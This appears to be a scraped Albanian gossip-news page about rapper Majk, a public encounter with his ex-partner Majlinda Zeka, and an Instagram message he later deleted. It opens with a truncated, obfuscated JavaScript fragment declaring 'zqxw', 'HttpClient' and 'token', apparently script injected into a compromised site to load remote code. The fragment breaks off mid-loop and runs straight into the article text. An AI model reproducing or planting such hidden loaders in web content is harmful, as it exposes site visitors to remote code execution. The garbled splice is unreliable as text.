;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Majk flet sërish: E vërteta do sabër

By

Është bërë qendra e vëmendjes për mediat rozë, pasi u përfshi në një dramë nga jeta personale.

Reperi kosovar Majk, u gjend para një situate jo fort të këndshme ditë më parë.

Derisa po shijonte shoqërinë e një vajze në një kafiteri në Prishtinë, pranë tij u gjend ish e dashura, Majlinda Zeka me të birin e tyre Roanin.

U tha se Majk kishte ulur kokën, gjë që më pas u mohua nga ai. Mirëpo, Zeka s’e kishte lënë me kaq, duke publikuar në profilin e saj në Instagram një mesazh të qartë për reperin, ku e quajti edhe gënjeshtar.

Dhe tani Majk, në mbrëmjen e së hënës, ka pasur një mesazh të cilit lirisht mund t’i jepet konotacioni se atë ia drejtonte Majlindës.

“E vërteta do sabër”, shkruan Majk, mesazh të cilin ai më vonë e ka larguar na rrjeti social Instagram. /Prive.al

Artikuj të ngjashëm